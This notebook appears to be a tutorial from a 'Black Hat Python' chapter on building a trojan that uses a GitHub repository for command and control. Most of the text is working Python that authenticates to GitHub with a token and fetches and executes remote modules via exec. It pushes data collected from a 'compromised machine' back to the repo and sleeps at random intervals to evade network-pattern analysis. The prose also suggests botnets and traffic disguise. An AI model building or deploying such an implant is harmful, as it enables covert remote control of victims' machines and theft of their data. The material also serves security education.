<a href="https://colab.research.google.com/github/damianiRiccardo90/BHP/blob/master/C7-Github_Command_And_Control/Building_A_Github_Aware_Trojan.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

### *__Building a Github-Aware Trojan__*

The main trojan will retrieve configuration options and code to run from Github. Let's start by writing the functions that connect and authenticate to the Github API and then communicate with it. Open a new file called __git_trojan.py__ and enter the following:

In [ ]:
import base64
import github3
import importlib
import json
import random
import sys
import threading
import time

from datetime import datetime

This simple setup code contains the necessary imports, which should keep our overall trojan size relatively small when compiled. We say __relatively__ because most compiled Python binaries using __pyinstaller__ are around __7MB__. (You can check out __pyinstaller__ here: https://www.pyinstaller.org/downloads.html). We'll drop this binary on the compromised machine.

If you were to explode this technique to build a full __botnet__ (a network of many such implants), you'd want the ability to automatically generate trojans, set their ID, create a configuration file that's pushed to Github, and compile the trojan into an executable. We won't build a botnet today, though; we'll let your imagination do the work.

Now let's put the relevant Github code in place:

In [ ]:
def github_connect(): #[1]
    with open('mytoken.txt') as f:
        token = f.read()
    user = 'tiarno'
    sess = github3.login(token=token)
    return sess.repository(user, 'bhptrojan')

def get_file_contents(dirname, module_name, repo): #[2]
    return repo.file_contents(f'{dirname}/{module_name}').content

These two functions handle the interaction with the Github repository. The __github_connect__ function reads the token created on Github __[1]__. When you created the token, you wrote it to a file called __mytoken.txt__. Now we read the token from that file and return a connection to the Github repository. You may want to create different tokens for different trojans so you can control what each trojan can access in your repository. That way, if victims catch your trojan, they can't come along and delete all of your retrieved data.

The __get_file_contents__ function receives the directory name, module name, and repository connection and returns the contents of the specified module __[2]__. This function is responsible for grabbing files from the remote repo and reading the contents in locally. We'll use it for reading both configuration options and the module source code.

Now we will create a __Trojan__ class that performs the essential trojaning tasks:

In [ ]:
class Trojan:
    def __init__(self, id): #[1]
        self.id = id
        self.config_file = f'{id}.json'
        self.data_path = f'data/{id}/' #[2]
        self.repo = github_connect() #[3]

When we initialize the Trojan object __[1]__, we assign its configuration information and the data path where the trojan will write its output files __[2]__, and we make the connection to the repository __[3]__. Now we'll add the methods we'll need to communicate with it:

In [ ]:
def get_config(self): #[1]
    config_json = get_file_contents('config', self.config_file, self.repo)
    config = json.loads(base64.b64decode(config_json))

    for task in config:
        if task['module'] not in sys.modules:
            exec('import %s' % task['module']) #[2]
    return config

def module_runner(self, module): #[3]
    result = sys.modules[module].run()
    self.store_module_result(result)

def store_module_result(self, data): #[4]
    message = datetime.now().isoformat()
    remote_path = f'data/{self.id}/{message}.data'
    bindata = bytes('%r' % data, 'utf-8')
    self.repo.create_file(remote_path, message, base64.b64encode(bindata))

def run(self): #[5]
    while True:
        config = self.get_config()
        for task in config:
            thread = threading.Thread(
                target=self.module_runner, args=(task['module'],)
            )
            thread.start()
            time.sleep(random.randint(1, 10))

        time.sleep(random.randint(30 * 60, 3 * 60 * 60)) #[6]

The __get_config__ method __[1]__ retrieves the remote configuration document from the repo so that your trojan knows which modules to run. The __exec__ call brings the module content into the trojan object __[2]__. The __module_runner__ method calls the __run__ function of the module just imported __[3]__. We'll go into more detail on how it gets called in the next section. And the __store_module_result__ method __[4]__ creates a file whose name includes the current date and time and then saves its output into that file. The trojan will use these three methods to push any data collected from the target machine to Github.

In the __run__ method __[5]__, we start executing these tasks. The first step is to grab the configuration file from the repo. Then we kick off the module in its own thread. While in the __module_runner__ method, we call the module's __run__ function to run its code. When it's done running, it should output a string that we then push to our repo.

When it finishes a task, the trojan will sleep for a random amount of time in an attempt to foil any network-pattern analysis __[6]__. You could, of course, create a bunch of traffic to google.com, or any number of other sites that appear benign, in an attempt to disguise what your trojan is up yo.

Now let's create an import hack to import remote files from the Github repo.